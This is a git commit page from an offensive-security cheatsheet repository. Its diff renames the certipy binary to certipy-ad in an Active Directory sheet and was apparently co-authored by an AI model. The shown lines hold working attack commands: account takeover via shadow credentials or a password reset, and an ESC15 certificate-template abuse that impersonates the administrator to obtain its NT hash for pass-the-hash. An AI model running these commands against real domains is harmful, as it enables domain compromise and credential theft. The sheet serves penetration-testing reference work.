daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

commit 12a7228c797ba17d1c6e595b37fb919a918926c0
parent f2b790878056e40e0c034518a748f2b7f2b5f9b6
Author: DAEMON <zer0sec.xp@icloud.com>
Date:   Sun, 20 Sep 2026 04:17:32 +0100

recycle-bin: use certipy-ad, the real binary name

The Kali package installs the binary as certipy-ad (certipy is a local alias), so the sheet now shows certipy-ad for reproducibility.

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>

Diffstat:
Msrc/content/sheets/active-directory/ad-recycle-bin-enumeration.md | 8++++----
1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/src/content/sheets/active-directory/ad-recycle-bin-enumeration.md b/src/content/sheets/active-directory/ad-recycle-bin-enumeration.md @@ -120,7 +120,7 @@ Get-ADUser -Identity <restored> | Select-Object SamAccountName,Enabled,Distingui If you control the restored object (e.g. `GenericAll` over its OU covers restored children too), take it over — reset the password or add shadow credentials: ```bash -certipy shadow auto -target "$DC" -u "$U" -p "$P" -account <restored> +certipy-ad shadow auto -target "$DC" -u "$U" -p "$P" -account <restored> # or: bloodyAD -u "$U" -d "$DOMAIN" -p "$P" --host "$DC" set password <restored> '<NewPass123!>' ``` @@ -130,12 +130,12 @@ A restored account brings back **rights the live tree was hiding** — group mem ```bash # enumerate templates as the restored principal -certipy find -target "$DC" -u <restored> -p '<pw>' -vulnerable -stdout +certipy-ad find -target "$DC" -u <restored> -p '<pw>' -vulnerable -stdout # e.g. ESC15 (CVE-2024-49019) on a schema-v1 template that supplies its own subject: -certipy req -u <restored>@$DOMAIN -p '<pw>' -dc-ip "$DC" -target "$DC" \ +certipy-ad req -u <restored>@$DOMAIN -p '<pw>' -dc-ip "$DC" -target "$DC" \ -ca '<CA-NAME>' -template '<VULN-TEMPLATE>' \ -upn administrator@$DOMAIN -application-policies 'Client Authentication' -certipy auth -pfx administrator.pfx -username administrator -domain "$DOMAIN" -dc-ip "$DC" +certipy-ad auth -pfx administrator.pfx -username administrator -domain "$DOMAIN" -dc-ip "$DC" # -> Administrator NT hash -> pass-the-hash ```